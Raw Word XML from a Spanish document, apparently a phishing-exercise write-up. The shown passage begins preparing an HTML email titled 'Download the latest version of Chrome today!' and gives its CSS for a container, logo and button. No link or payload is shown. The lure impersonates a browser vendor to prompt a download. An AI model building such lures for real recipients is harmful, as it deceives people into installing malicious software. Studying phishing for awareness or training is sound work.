        <w:t>Lo primero que haré será preparar el correo electrónico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252E1088" w14:textId="77777777" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0458EA6E" w14:textId="4FCBC6E8" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Teniendo este código html:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6284EA53" w14:textId="77777777" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F96ABC"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lt;!</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DOCTYPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8062D2"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175BF8CB"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>head</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6449CE"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;¡Descarga la última versión de Chrome hoy mismo!&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2870374F"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74069282"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w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.container</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F8A00"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max-width: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CDF6BF"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margin: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>auto</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7FC192"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padding: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0931E31F"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background-color: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#f2f2f2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E2D103"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text-align: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>center</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D793522"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font-family: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Arial</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sans-serif</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF83968"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font-size: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BF45E4"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line-height: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>1.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E90003"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border-radius: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB2582A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ED44BB"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w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.logo</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6472B557"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width: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA3AABE"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height: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>auto</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D9F038"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margin-bottom: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E19333"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lastRenderedPageBreak/>
        <w:t>        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D8D2DC"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w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.button</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701E18C3"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display: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>inline-block</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA8DEAF"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padding: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>px</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
